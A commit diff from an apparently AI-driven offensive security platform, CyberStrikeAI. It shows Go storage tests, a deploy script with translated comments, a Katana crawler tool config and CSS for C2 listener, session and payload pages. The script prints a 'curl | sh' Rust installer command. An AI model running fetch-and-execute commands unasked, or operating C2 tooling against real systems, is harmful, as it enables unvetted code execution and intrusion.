t.Fatal("元数据文件不存在")
}
// 删除结果
err = storage.DeleteResult(executionID)
if err != nil {
t.Fatalf("删除结果失败: %v", err)
}
// 验证文件已删除
if _, err := os.Stat(resultPath); !os.IsNotExist(err) {
t.Fatal("结果文件未被删除")
}
if _, err := os.Stat(metadataPath); !os.IsNotExist(err) {
t.Fatal("元数据文件未被删除")
}
// 测试删除不存在的执行ID(应该不报错)
err = storage.DeleteResult("nonexistent_id")
if err != nil {
t.Errorf("删除不存在的执行ID不应该报错: %v", err)
}
}
func TestFileResultStorage_ConcurrentAccess(t *testing.T) {
storage, tmpDir := setupTestStorage(t)
defer cleanupTestStorage(t, tmpDir)
// 并发保存多个结果
done := make(chan bool, 10)
for i := 0; i < 10; i++ {
go func(id int) {
executionID := fmt.Sprintf("test_exec_%d", id)
toolName := "test_tool"
result := fmt.Sprintf("Result %d\nLine 2\nLine 3", id)
err := storage.SaveResult(executionID, toolName, result)
if err != nil {
t.Errorf("并发保存失败 (ID: %s): %v", executionID, err)
}
// 并发读取
_, err = storage.GetResult(executionID)
if err != nil {
t.Errorf("并发读取失败 (ID: %s): %v", executionID, err)
}
done <- true
}(i)
}
// 等待所有goroutine完成
for i := 0; i < 10; i++ {
<-done
}
}
func TestFileResultStorage_LargeResult(t *testing.T) {
storage, tmpDir := setupTestStorage(t)
defer cleanupTestStorage(t, tmpDir)
executionID := "test_exec_large"
toolName := "test_tool"
// 创建大结果(1000行)
lines := make([]string, 1000)
for i := 0; i < 1000; i++ {
lines[i] = fmt.Sprintf("Line %d: This is a test line with some content", i+1)
}
result := strings.Join(lines, "\n")
// 保存大结果
err := storage.SaveResult(executionID, toolName, result)
if err != nil {
t.Fatalf("保存大结果失败: %v", err)
}
// 验证元数据
metadata, err := storage.GetResultMetadata(executionID)
if err != nil {
t.Fatalf("获取元数据失败: %v", err)
}
if metadata.TotalLines != 1000 {
t.Errorf("总行数不匹配。期望: 1000, 实际: %d", metadata.TotalLines)
}
// 测试分页查询大结果
page, err := storage.GetResultPage(executionID, 1, 100)
if err != nil {
t.Fatalf("获取第一页失败: %v", err)
}
if page.TotalPages != 10 {
t.Errorf("总页数不匹配。期望: 10, 实际: %d", page.TotalPages)
}
if len(page.Lines) != 100 {
t.Errorf("第一页行数不匹配。期望: 100, 实际: %d", len(page.Lines))
}
}
+107 -107
View File
@@ -2,11 +2,11 @@
set -euo pipefail set -euo pipefail
# CyberStrikeAI 一键部署启动脚本 # CyberStrikeAI one-click deploy and start script
ROOT_DIR="$(cd "$(dirname "$0")" && pwd)" ROOT_DIR="$(cd "$(dirname "$0")" && pwd)"
cd "$ROOT_DIR" cd "$ROOT_DIR"
# 颜色定义 # Color definitions
RED='\033[0;31m' RED='\033[0;31m'
GREEN='\033[0;32m' GREEN='\033[0;32m'
YELLOW='\033[1;33m' YELLOW='\033[1;33m'
@@ -14,31 +14,31 @@ BLUE='\033[0;34m'
CYAN='\033[0;36m' CYAN='\033[0;36m'
NC='\033[0m' # No Color NC='\033[0m' # No Color
# 打印带颜色的消息 # Print colored messages
info() { echo -e "${BLUE}$1${NC}"; } info() { echo -e "${BLUE}$1${NC}"; }
success() { echo -e "${GREEN}$1${NC}"; } success() { echo -e "${GREEN}$1${NC}"; }
warning() { echo -e "${YELLOW}⚠️ $1${NC}"; } warning() { echo -e "${YELLOW}⚠️ $1${NC}"; }
error() { echo -e "${RED}$1${NC}"; } error() { echo -e "${RED}$1${NC}"; }
note() { echo -e "${CYAN}$1${NC}"; } note() { echo -e "${CYAN}$1${NC}"; }
# 临时源配置(仅在此脚本中生效) # Temporary mirror/proxy settings (only effective in this script)
PIP_INDEX_URL="${PIP_INDEX_URL:-https://pypi.tuna.tsinghua.edu.cn/simple}" PIP_INDEX_URL="${PIP_INDEX_URL:-https://pypi.tuna.tsinghua.edu.cn/simple}"
GOPROXY="${GOPROXY:-https://goproxy.cn,direct}" GOPROXY="${GOPROXY:-https://goproxy.cn,direct}"
# 保存原始环境变量(用于恢复) # Save original env vars (for restoration)
ORIGINAL_PIP_INDEX_URL="${PIP_INDEX_URL:-}" ORIGINAL_PIP_INDEX_URL="${PIP_INDEX_URL:-}"
ORIGINAL_GOPROXY="${GOPROXY:-}" ORIGINAL_GOPROXY="${GOPROXY:-}"
# 进度显示函数 # Progress display helper
show_progress() { show_progress() {
local pid=$1 local pid=$1
local message=$2 local message=$2
local i=0 local i=0
local dots="" local dots=""
# 检查进程是否存在 # Check if the process exists
if ! kill -0 "$pid" 2>/dev/null; then if ! kill -0 "$pid" 2>/dev/null; then
# 进程已经结束,立即返回 # Process already finished; return immediately
return 0 return 0
fi fi
@@ -53,7 +53,7 @@ show_progress() {
printf "\r${BLUE}⏳ %s%s${NC}" "$message" "$dots" printf "\r${BLUE}⏳ %s%s${NC}" "$message" "$dots"
sleep 0.5 sleep 0.5
# 再次检查进程是否还存在 # Re-check whether the process is still running
if ! kill -0 "$pid" 2>/dev/null; then if ! kill -0 "$pid" 2>/dev/null; then
break break
fi fi
@@ -63,21 +63,21 @@ show_progress() {
echo "" echo ""
echo "==========================================" echo "=========================================="
echo " CyberStrikeAI 一键部署启动脚本" echo " CyberStrikeAI Deploy & Start Script"
echo " (默认 HTTPS 自签证书;纯 HTTP 请用: $0 --http" echo " (HTTPS with self-signed cert by default; plain HTTP: $0 --http)"
echo "==========================================" echo "=========================================="
echo "" echo ""
# 显示临时源配置信息 # Show temporary mirror/proxy info
echo "" echo ""
warning "⚠️ 注意:此脚本将使用临时镜像源加速下载" warning "Note: this script uses temporary mirrors to speed up downloads"
echo "" echo ""
info "Python pip 临时镜像源:" info "Python pip temporary mirror:"
echo " ${PIP_INDEX_URL}" echo " ${PIP_INDEX_URL}"
info "Go Proxy 临时镜像源:" info "Go temporary proxy:"
echo " ${GOPROXY}" echo " ${GOPROXY}"
echo "" echo ""
note "这些设置仅在脚本运行期间生效,不会修改系统配置" note "These settings apply only while this script runs and do not change system config"
echo "" echo ""
sleep 1 sleep 1
@@ -86,19 +86,19 @@ VENV_DIR="$ROOT_DIR/venv"
REQUIREMENTS_FILE="$ROOT_DIR/requirements.txt" REQUIREMENTS_FILE="$ROOT_DIR/requirements.txt"
BINARY_NAME="cyberstrike-ai" BINARY_NAME="cyberstrike-ai"
# 检查配置文件 # Check config file
if [ ! -f "$CONFIG_FILE" ]; then if [ ! -f "$CONFIG_FILE" ]; then
error "配置文件 config.yaml 不存在" error "Config file config.yaml not found"
info "请确保在项目根目录运行此脚本" info "Make sure you run this script from the project root"
exit 1 exit 1
fi fi
# 检查并安装 Python 环境 # Check Python environment
check_python() { check_python() {
if ! command -v python3 >/dev/null 2>&1; then if ! command -v python3 >/dev/null 2>&1; then
error "未找到 python3" error "python3 not found"
echo "" echo ""
info "请先安装 Python 3.10 或更高版本:" info "Install Python 3.10 or later first:"
echo " macOS: brew install python3" echo " macOS: brew install python3"
echo " Ubuntu: sudo apt-get install python3 python3-venv" echo " Ubuntu: sudo apt-get install python3 python3-venv"
echo " CentOS: sudo yum install python3 python3-pip" echo " CentOS: sudo yum install python3 python3-pip"
@@ -110,23 +110,23 @@ check_python() {
PYTHON_MINOR=$(echo "$PYTHON_VERSION" | cut -d. -f2) PYTHON_MINOR=$(echo "$PYTHON_VERSION" | cut -d. -f2)
if [ "$PYTHON_MAJOR" -lt 3 ] || ([ "$PYTHON_MAJOR" -eq 3 ] && [ "$PYTHON_MINOR" -lt 10 ]); then if [ "$PYTHON_MAJOR" -lt 3 ] || ([ "$PYTHON_MAJOR" -eq 3 ] && [ "$PYTHON_MINOR" -lt 10 ]); then
error "Python 版本过低: $PYTHON_VERSION (需要 3.10+)" error "Python version too old: $PYTHON_VERSION (requires 3.10+)"
exit 1 exit 1
fi fi
success "Python 环境检查通过: $PYTHON_VERSION" success "Python check passed: $PYTHON_VERSION"
} }
# 检查并安装 Go 环境 # Check Go environment
check_go() { check_go() {
if ! command -v go >/dev/null 2>&1; then if ! command -v go >/dev/null 2>&1; then
error "未找到 Go" error "Go not found"
echo "" echo ""
info "请先安装 Go 1.21 或更高版本:" info "Install Go 1.21 or later first:"
echo " macOS: brew install go" echo " macOS: brew install go"
echo " Ubuntu: sudo apt-get install golang-go" echo " Ubuntu: sudo apt-get install golang-go"
echo " CentOS: sudo yum install golang" echo " CentOS: sudo yum install golang"
echo " 或访问: https://go.dev/dl/" echo " Or visit: https://go.dev/dl/"
exit 1 exit 1
fi fi
@@ -135,63 +135,63 @@ check_go() {
GO_MINOR=$(echo "$GO_VERSION" | cut -d. -f2) GO_MINOR=$(echo "$GO_VERSION" | cut -d. -f2)
if [ "$GO_MAJOR" -lt 1 ] || ([ "$GO_MAJOR" -eq 1 ] && [ "$GO_MINOR" -lt 21 ]); then if [ "$GO_MAJOR" -lt 1 ] || ([ "$GO_MAJOR" -eq 1 ] && [ "$GO_MINOR" -lt 21 ]); then
error "Go 版本过低: $GO_VERSION (需要 1.21+)" error "Go version too old: $GO_VERSION (requires 1.21+)"
exit 1 exit 1
fi fi
success "Go 环境检查通过: $(go version)" success "Go check passed: $(go version)"
} }
# 设置 Python 虚拟环境 # Set up Python virtual environment
setup_python_env() { setup_python_env() {
if [ ! -d "$VENV_DIR" ]; then if [ ! -d "$VENV_DIR" ]; then
info "创建 Python 虚拟环境..." info "Creating Python virtual environment..."
python3 -m venv "$VENV_DIR" python3 -m venv "$VENV_DIR"
success "虚拟环境创建完成" success "Virtual environment created"
else else
info "Python 虚拟环境已存在" info "Python virtual environment already exists"
fi fi
info "激活虚拟环境..." info "Activating virtual environment..."
# shellcheck disable=SC1091 # shellcheck disable=SC1091
source "$VENV_DIR/bin/activate" source "$VENV_DIR/bin/activate"
if [ -f "$REQUIREMENTS_FILE" ]; then if [ -f "$REQUIREMENTS_FILE" ]; then
echo "" echo ""
note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
note "⚠️ 使用临时 pip 镜像源(仅本次脚本运行有效)" note "Using temporary pip mirror (this script run only)"
note " 镜像地址: ${PIP_INDEX_URL}" note " Mirror URL: ${PIP_INDEX_URL}"
note " 如需永久配置,请设置环境变量 PIP_INDEX_URL" note " For a permanent setting, set the PIP_INDEX_URL env var"
note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "" echo ""
info "升级 pip..." info "Upgrading pip..."
pip install --index-url "$PIP_INDEX_URL" --upgrade pip >/dev/null 2>&1 || true pip install --index-url "$PIP_INDEX_URL" --upgrade pip >/dev/null 2>&1 || true
info "安装 Python 依赖包..." info "Installing Python dependencies..."
echo "" echo ""
# 尝试安装依赖,捕获错误输出并显示进度 # Install deps in background; capture errors and show progress
PIP_LOG=$(mktemp) PIP_LOG=$(mktemp)
( (
set +e # 在子shell中禁用错误退出 set +e # disable errexit in subshell
pip install --index-url "$PIP_INDEX_URL" -r "$REQUIREMENTS_FILE" >"$PIP_LOG" 2>&1 pip install --index-url "$PIP_INDEX_URL" -r "$REQUIREMENTS_FILE" >"$PIP_LOG" 2>&1
echo $? > "${PIP_LOG}.exit" echo $? > "${PIP_LOG}.exit"
) & ) &
PIP_PID=$! PIP_PID=$!
# 等待一小段时间,确保进程启动 # Brief pause so the process can start
sleep 0.1 sleep 0.1
# 显示进度(如果进程还在运行) # Show progress while still running
if kill -0 "$PIP_PID" 2>/dev/null; then if kill -0 "$PIP_PID" 2>/dev/null; then
show_progress "$PIP_PID" "正在安装依赖包" show_progress "$PIP_PID" "Installing dependencies"
else else
# 进程已经结束,等待一下确保退出码文件已写入 # Process already finished; wait for exit code file
sleep 0.2 sleep 0.2
fi fi
# 等待进程完成,忽略 wait 的退出码 # Wait for completion; ignore wait exit code
wait "$PIP_PID" 2>/dev/null || true wait "$PIP_PID" 2>/dev/null || true
PIP_EXIT_CODE=0 PIP_EXIT_CODE=0
@@ -199,74 +199,74 @@ setup_python_env() {
PIP_EXIT_CODE=$(cat "${PIP_LOG}.exit" 2>/dev/null || echo "1") PIP_EXIT_CODE=$(cat "${PIP_LOG}.exit" 2>/dev/null || echo "1")
rm -f "${PIP_LOG}.exit" 2>/dev/null || true rm -f "${PIP_LOG}.exit" 2>/dev/null || true
else else
# 如果没有退出码文件,检查日志中是否有错误 # No exit code file; check log for errors
if [ -f "$PIP_LOG" ] && grep -q -i "error\|failed\|exception" "$PIP_LOG" 2>/dev/null; then if [ -f "$PIP_LOG" ] && grep -q -i "error\|failed\|exception" "$PIP_LOG" 2>/dev/null; then
PIP_EXIT_CODE=1 PIP_EXIT_CODE=1
fi fi
fi fi
if [ $PIP_EXIT_CODE -eq 0 ]; then if [ $PIP_EXIT_CODE -eq 0 ]; then
success "Python 依赖安装完成" success "Python dependencies installed"
else else
# 检查是否是 angr 安装失败(需要 Rust # Check for angr install failure (needs Rust)
if grep -q "angr" "$PIP_LOG" && grep -q "Rust compiler\|can't find Rust" "$PIP_LOG"; then if grep -q "angr" "$PIP_LOG" && grep -q "Rust compiler\|can't find Rust" "$PIP_LOG"; then
warning "angr 安装失败(需要 Rust 编译器)" warning "angr install failed (Rust compiler required)"
echo "" echo ""
info "angr 是可选依赖,主要用于二进制分析工具" info "angr is optional and mainly used for binary analysis tools"
info "如果需要使用 angr,请先安装 Rust:" info "To use angr, install Rust first:"
echo " macOS: curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh" echo " macOS: curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh"
echo " Ubuntu: curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh" echo " Ubuntu: curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh"
echo " 或访问: https://rustup.rs/" echo " Or visit: https://rustup.rs/"
echo "" echo ""
info "其他依赖已安装,可以继续使用(部分工具可能不可用)" info "Other dependencies are installed; you can continue (some tools may be unavailable)"
else else
warning "部分 Python 依赖安装失败,但可以继续尝试运行" warning "Some Python dependencies failed to install, but continuing"
warning "如果遇到问题,请检查错误信息并手动安装缺失的依赖" warning "If you hit issues, check the errors and install missing packages manually"
# 显示最后几行错误信息 # Show last lines of error output
echo "" echo ""
info "错误详情(最后 10 行):" info "Error details (last 10 lines):"
tail -n 10 "$PIP_LOG" | sed 's/^/ /' tail -n 10 "$PIP_LOG" | sed 's/^/ /'
echo "" echo ""
fi fi
fi fi
rm -f "$PIP_LOG" rm -f "$PIP_LOG"
else else
warning "未找到 requirements.txt,跳过 Python 依赖安装" warning "requirements.txt not found; skipping Python dependency install"
fi fi
} }
# 构建 Go 项目 # Build Go project
build_go_project() { build_go_project() {
echo "" echo ""
note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
note "⚠️ 使用临时 Go Proxy(仅本次脚本运行有效)" note "Using temporary Go proxy (this script run only)"
note " Proxy 地址: ${GOPROXY}" note " Proxy URL: ${GOPROXY}"
note " 如需永久配置,请设置环境变量 GOPROXY" note " For a permanent setting, set the GOPROXY env var"
note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━" note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
echo "" echo ""
info "下载 Go 依赖..." info "Downloading Go dependencies..."
GO_DOWNLOAD_LOG=$(mktemp) GO_DOWNLOAD_LOG=$(mktemp)
( (
set +e # 在子shell中禁用错误退出 set +e # disable errexit in subshell
export GOPROXY="$GOPROXY" export GOPROXY="$GOPROXY"
go mod download >"$GO_DOWNLOAD_LOG" 2>&1 go mod download >"$GO_DOWNLOAD_LOG" 2>&1
echo $? > "${GO_DOWNLOAD_LOG}.exit" echo $? > "${GO_DOWNLOAD_LOG}.exit"
) & ) &
GO_DOWNLOAD_PID=$! GO_DOWNLOAD_PID=$!
# 等待一小段时间,确保进程启动 # Brief pause so the process can start
sleep 0.1 sleep 0.1
# 显示进度(如果进程还在运行) # Show progress while still running
if kill -0 "$GO_DOWNLOAD_PID" 2>/dev/null; then if kill -0 "$GO_DOWNLOAD_PID" 2>/dev/null; then
show_progress "$GO_DOWNLOAD_PID" "正在下载 Go 依赖" show_progress "$GO_DOWNLOAD_PID" "Downloading Go dependencies"
else else
# 进程已经结束,等待一下确保退出码文件已写入 # Process already finished; wait for exit code file
sleep 0.2 sleep 0.2
fi fi
# 等待进程完成,忽略 wait 的退出码 # Wait for completion; ignore wait exit code
wait "$GO_DOWNLOAD_PID" 2>/dev/null || true wait "$GO_DOWNLOAD_PID" 2>/dev/null || true
GO_DOWNLOAD_EXIT_CODE=0 GO_DOWNLOAD_EXIT_CODE=0
@@ -274,7 +274,7 @@ build_go_project() {
GO_DOWNLOAD_EXIT_CODE=$(cat "${GO_DOWNLOAD_LOG}.exit" 2>/dev/null || echo "1") GO_DOWNLOAD_EXIT_CODE=$(cat "${GO_DOWNLOAD_LOG}.exit" 2>/dev/null || echo "1")
rm -f "${GO_DOWNLOAD_LOG}.exit" 2>/dev/null || true rm -f "${GO_DOWNLOAD_LOG}.exit" 2>/dev/null || true
else else
# 如果没有退出码文件,检查日志中是否有错误 # No exit code file; check log for errors
if [ -f "$GO_DOWNLOAD_LOG" ] && grep -q -i "error\|failed" "$GO_DOWNLOAD_LOG" 2>/dev/null; then if [ -f "$GO_DOWNLOAD_LOG" ] && grep -q -i "error\|failed" "$GO_DOWNLOAD_LOG" 2>/dev/null; then
GO_DOWNLOAD_EXIT_CODE=1 GO_DOWNLOAD_EXIT_CODE=1
fi fi
@@ -282,33 +282,33 @@ build_go_project() {
rm -f "$GO_DOWNLOAD_LOG" 2>/dev/null || true rm -f "$GO_DOWNLOAD_LOG" 2>/dev/null || true
if [ $GO_DOWNLOAD_EXIT_CODE -ne 0 ]; then if [ $GO_DOWNLOAD_EXIT_CODE -ne 0 ]; then
error "Go 依赖下载失败" error "Go dependency download failed"
exit 1 exit 1
fi fi
success "Go 依赖下载完成" success "Go dependencies downloaded"
info "构建项目..." info "Building project..."
GO_BUILD_LOG=$(mktemp) GO_BUILD_LOG=$(mktemp)
( (
set +e # 在子shell中禁用错误退出 set +e # disable errexit in subshell
export GOPROXY="$GOPROXY" export GOPROXY="$GOPROXY"
go build -o "$BINARY_NAME" cmd/server/main.go >"$GO_BUILD_LOG" 2>&1 go build -o "$BINARY_NAME" cmd/server/main.go >"$GO_BUILD_LOG" 2>&1
echo $? > "${GO_BUILD_LOG}.exit" echo $? > "${GO_BUILD_LOG}.exit"
) & ) &
GO_BUILD_PID=$! GO_BUILD_PID=$!
# 等待一小段时间,确保进程启动 # Brief pause so the process can start
sleep 0.1 sleep 0.1
# 显示进度(如果进程还在运行) # Show progress while still running
if kill -0 "$GO_BUILD_PID" 2>/dev/null; then if kill -0 "$GO_BUILD_PID" 2>/dev/null; then
show_progress "$GO_BUILD_PID" "正在构建项目" show_progress "$GO_BUILD_PID" "Building project"
else else
# 进程已经结束,等待一下确保退出码文件已写入 # Process already finished; wait for exit code file
sleep 0.2 sleep 0.2
fi fi
# 等待进程完成,忽略 wait 的退出码 # Wait for completion; ignore wait exit code
wait "$GO_BUILD_PID" 2>/dev/null || true wait "$GO_BUILD_PID" 2>/dev/null || true
GO_BUILD_EXIT_CODE=0 GO_BUILD_EXIT_CODE=0
@@ -316,20 +316,20 @@ build_go_project() {
GO_BUILD_EXIT_CODE=$(cat "${GO_BUILD_LOG}.exit" 2>/dev/null || echo "1") GO_BUILD_EXIT_CODE=$(cat "${GO_BUILD_LOG}.exit" 2>/dev/null || echo "1")
rm -f "${GO_BUILD_LOG}.exit" 2>/dev/null || true rm -f "${GO_BUILD_LOG}.exit" 2>/dev/null || true
else else
# 如果没有退出码文件,检查日志中是否有错误 # No exit code file; check log for errors
if [ -f "$GO_BUILD_LOG" ] && grep -q -i "error\|failed" "$GO_BUILD_LOG" 2>/dev/null; then if [ -f "$GO_BUILD_LOG" ] && grep -q -i "error\|failed" "$GO_BUILD_LOG" 2>/dev/null; then
GO_BUILD_EXIT_CODE=1 GO_BUILD_EXIT_CODE=1
fi fi
fi fi
if [ $GO_BUILD_EXIT_CODE -eq 0 ]; then if [ $GO_BUILD_EXIT_CODE -eq 0 ]; then
success "项目构建完成: $BINARY_NAME" success "Build complete: $BINARY_NAME"
rm -f "$GO_BUILD_LOG" rm -f "$GO_BUILD_LOG"
else else
error "项目构建失败" error "Build failed"
# 显示构建错误 # Show build errors
echo "" echo ""
info "构建错误详情:" info "Build error details:"
cat "$GO_BUILD_LOG" | sed 's/^/ /' cat "$GO_BUILD_LOG" | sed 's/^/ /'
echo "" echo ""
rm -f "$GO_BUILD_LOG" rm -f "$GO_BUILD_LOG"
@@ -337,24 +337,24 @@ build_go_project() {
fi fi
} }
# 检查是否需要重新构建 # Check whether a rebuild is needed
need_rebuild() { need_rebuild() {
if [ ! -f "$BINARY_NAME" ]; then if [ ! -f "$BINARY_NAME" ]; then
return 0 # 需要构建 return 0 # needs build
fi fi
# 检查源代码是否有更新 # Check if source changed since last build
if [ "$BINARY_NAME" -ot cmd/server/main.go ] || \ if [ "$BINARY_NAME" -ot cmd/server/main.go ] || \
[ "$BINARY_NAME" -ot go.mod ] || \ [ "$BINARY_NAME" -ot go.mod ] || \
find internal cmd -name "*.go" -newer "$BINARY_NAME" 2>/dev/null | grep -q .; then find internal cmd -name "*.go" -newer "$BINARY_NAME" 2>/dev/null | grep -q .; then
return 0 # 需要重新构建 return 0 # needs rebuild
fi fi
return 1 # 不需要构建 return 1 # no rebuild needed
} }
# 主流程 # Main flow
# 默认启动主站 HTTPS--https 传给二进制);传 --http 则走明文 HTTP # Default: HTTPS (--https passed to binary); --http uses plain HTTP.
main() { main() {
USE_HTTPS=1 USE_HTTPS=1
FORWARD_ARGS=() FORWARD_ARGS=()
@@ -366,39 +366,39 @@ main() {
FORWARD_ARGS+=("$arg") FORWARD_ARGS+=("$arg")
done done
# 环境检查 # Environment checks
info "检查运行环境..." info "Checking runtime environment..."
check_python check_python
check_go check_go
echo "" echo ""
# 设置 Python 环境 # Python setup
info "设置 Python 环境..." info "Setting up Python environment..."
setup_python_env setup_python_env
echo "" echo ""
# 构建 Go 项目 # Go build
if need_rebuild; then if need_rebuild; then
info "准备构建项目..." info "Preparing to build project..."
build_go_project build_go_project
else else
success "可执行文件已是最新,跳过构建" success "Binary is up to date; skipping build"
fi fi
echo "" echo ""
# 启动服务器 # Start server
success "所有准备工作完成!" success "All setup complete!"
echo "" echo ""
if [ "$USE_HTTPS" -eq 1 ]; then if [ "$USE_HTTPS" -eq 1 ]; then
info "启动 CyberStrikeAI 服务器(HTTPS + HTTP/2,自签证书)..." info "Starting CyberStrikeAI server (HTTPS + HTTP/2, self-signed cert)..."
note "纯 HTTP 启动请使用: $0 --http" note "For plain HTTP, use: $0 --http"
else else
info "启动 CyberStrikeAI 服务器(HTTP..." info "Starting CyberStrikeAI server (HTTP)..."
fi fi
echo "==========================================" echo "=========================================="
echo "" echo ""
# 始终传入项目根目录下的 config.yaml,避免 cwd 不在项目根时找不到配置;额外参数仍可追加(如再次 -config 覆盖,以 Go flag 后写为准)。 # Always pass config.yaml from project root so cwd does not matter; extra args still apply (e.g. -config override; last Go flag wins).
if [ "$USE_HTTPS" -eq 1 ]; then if [ "$USE_HTTPS" -eq 1 ]; then
if [ "${#FORWARD_ARGS[@]}" -gt 0 ]; then if [ "${#FORWARD_ARGS[@]}" -gt 0 ]; then
exec "./$BINARY_NAME" -config "$CONFIG_FILE" --https "${FORWARD_ARGS[@]}" exec "./$BINARY_NAME" -config "$CONFIG_FILE" --https "${FORWARD_ARGS[@]}"
@@ -414,5 +414,5 @@ main() {
fi fi
} }
# 执行主流程(支持参数,如: ./run.sh --http # Run main (supports args, e.g. ./run.sh --http)
main "$@" main "$@"
+6 -6
View File
@@ -39,9 +39,9 @@ parameters:
default: true default: true
- name: "form_extraction" - name: "form_extraction"
type: "bool" type: "bool"
description: "启用表单提取" description: "启用表单提取-fx / -form-extraction"
required: false required: false
flag: "-forms" flag: "-fx"
format: "flag" format: "flag"
default: true default: true
- name: "additional_args" - name: "additional_args"
@@ -50,10 +50,10 @@ parameters:
额外的Katana参数。用于传递未在参数列表中定义的Katana选项。 额外的Katana参数。用于传递未在参数列表中定义的Katana选项。
**示例值:** **示例值:**
- "--headless": 使用无头浏览器 - "-headless": 使用无头浏览器
- "-f": 输出格式 - "-output-template '{{url}}'": 自定义输出格式
- "-o output.txt": 输出到文件 - "-output output.txt": 输出到文件
- "-c": 并发数 - "-c 20": 并发数
**注意事项:** **注意事项:**
- 多个参数用空格分隔 - 多个参数用空格分隔
+4 -132
View File
@@ -37,7 +37,6 @@
Form Controls (scoped to C2 pages) Form Controls (scoped to C2 pages)
============================================================================ */ ============================================================================ */
#page-c2 .form-control,
#page-c2-listeners .form-control, #page-c2-listeners .form-control,
#page-c2-sessions .form-control, #page-c2-sessions .form-control,
#page-c2-tasks .form-control, #page-c2-tasks .form-control,
@@ -61,7 +60,6 @@
appearance: none; appearance: none;
} }
#page-c2 .form-control:focus,
#page-c2-listeners .form-control:focus, #page-c2-listeners .form-control:focus,
#page-c2-sessions .form-control:focus, #page-c2-sessions .form-control:focus,
#page-c2-tasks .form-control:focus, #page-c2-tasks .form-control:focus,
@@ -73,7 +71,6 @@
box-shadow: 0 0 0 3px var(--c2-accent-dim); box-shadow: 0 0 0 3px var(--c2-accent-dim);
} }
#page-c2 select.form-control,
#page-c2-payloads select.form-control, #page-c2-payloads select.form-control,
.c2-modal select.form-control { .c2-modal select.form-control {
background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' viewBox='0 0 12 12'%3E%3Cpath fill='%2364748b' d='M2.5 4.5L6 8l3.5-3.5'/%3E%3C/svg%3E"); background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' width='12' height='12' viewBox='0 0 12 12'%3E%3Cpath fill='%2364748b' d='M2.5 4.5L6 8l3.5-3.5'/%3E%3C/svg%3E");
@@ -85,7 +82,6 @@
} }
/* 原生下拉:避免 appearance:none 在部分浏览器中导致 select 无法正常展开 */ /* 原生下拉:避免 appearance:none 在部分浏览器中导致 select 无法正常展开 */
#page-c2 select.form-control.c2-native-select,
#page-c2-payloads select.form-control.c2-native-select, #page-c2-payloads select.form-control.c2-native-select,
.c2-modal select.form-control.c2-native-select { .c2-modal select.form-control.c2-native-select {
appearance: auto; appearance: auto;
@@ -94,7 +90,6 @@
padding-right: 14px; padding-right: 14px;
} }
#page-c2 textarea.form-control,
#page-c2-payloads textarea.form-control, #page-c2-payloads textarea.form-control,
.c2-modal textarea.form-control { .c2-modal textarea.form-control {
resize: vertical; resize: vertical;
@@ -104,7 +99,6 @@
line-height: 1.6; line-height: 1.6;
} }
#page-c2 .form-control::placeholder,
#page-c2-payloads .form-control::placeholder, #page-c2-payloads .form-control::placeholder,
.c2-modal .form-control::placeholder { .c2-modal .form-control::placeholder {
color: var(--c2-text-muted); color: var(--c2-text-muted);
@@ -140,9 +134,6 @@
Layout Layout
============================================================================ */ ============================================================================ */
.c2-layout { display: flex; flex-direction: column; height: 100%; }
.c2-main { flex: 1; overflow-y: auto; }
.c2-empty { .c2-empty {
display: flex; display: flex;
flex-direction: column; flex-direction: column;
@@ -171,103 +162,6 @@
margin: 12px; margin: 12px;
} }
/* ============================================================================
Dashboard / Welcome
============================================================================ */
.c2-welcome {
text-align: center;
padding: 100px 24px 80px;
max-width: 860px;
margin: 0 auto;
}
.c2-welcome-icon {
margin-bottom: 16px;
animation: c2-float 4s ease-in-out infinite;
}
@keyframes c2-float {
0%, 100% { transform: translateY(0); }
50% { transform: translateY(-8px); }
}
.c2-welcome h3 {
font-size: 28px;
margin-bottom: 12px;
color: var(--c2-text);
font-weight: 800;
letter-spacing: -0.5px;
}
.c2-welcome p {
color: var(--c2-text-dim);
font-size: 15px;
line-height: 1.7;
margin-bottom: 48px;
max-width: 520px;
margin-left: auto;
margin-right: auto;
}
.c2-stats {
display: flex;
justify-content: center;
gap: 16px;
margin-bottom: 48px;
flex-wrap: wrap;
}
.c2-stat-item {
display: flex;
flex-direction: column;
align-items: center;
padding: 28px 40px;
background: var(--c2-surface);
border-radius: var(--c2-radius);
border: 1.5px solid var(--c2-border);
min-width: 160px;
transition: all 0.3s ease;
}
.c2-stat-item:hover {
transform: translateY(-4px);
box-shadow: var(--c2-shadow-md);
border-color: var(--c2-accent);
}
.c2-stat-item:nth-child(1) .c2-stat-value { color: var(--c2-accent); }
.c2-stat-item:nth-child(2) .c2-stat-value { color: var(--c2-green); }
.c2-stat-item:nth-child(3) .c2-stat-value { color: var(--c2-amber); }
.c2-stat-value {
font-size: 36px;
font-weight: 800;
line-height: 1;
letter-spacing: -1px;
}
.c2-stat-label {
font-size: 12px;
color: var(--c2-text-dim);
margin-top: 12px;
font-weight: 600;
letter-spacing: 0.3px;
}
.c2-actions {
display: flex;
gap: 12px;
justify-content: center;
flex-wrap: wrap;
max-width: 420px;
margin-inline: auto;
}
.c2-actions > button {
flex: 1;
min-width: min(100%, 160px);
}
/* ============================================================================ /* ============================================================================
Listener Cards Listener Cards
============================================================================ */ ============================================================================ */
@@ -1477,7 +1371,6 @@
Modal Modal
============================================================================ */ ============================================================================ */
/* Toast 须高于模态遮罩 (10050),避免被 backdrop-filter 模糊 */
#c2-toast-container { #c2-toast-container {
z-index: 10100 !important; z-index: 10100 !important;
} }
@@ -1485,9 +1378,7 @@
.c2-modal-overlay { .c2-modal-overlay {
position: fixed; position: fixed;
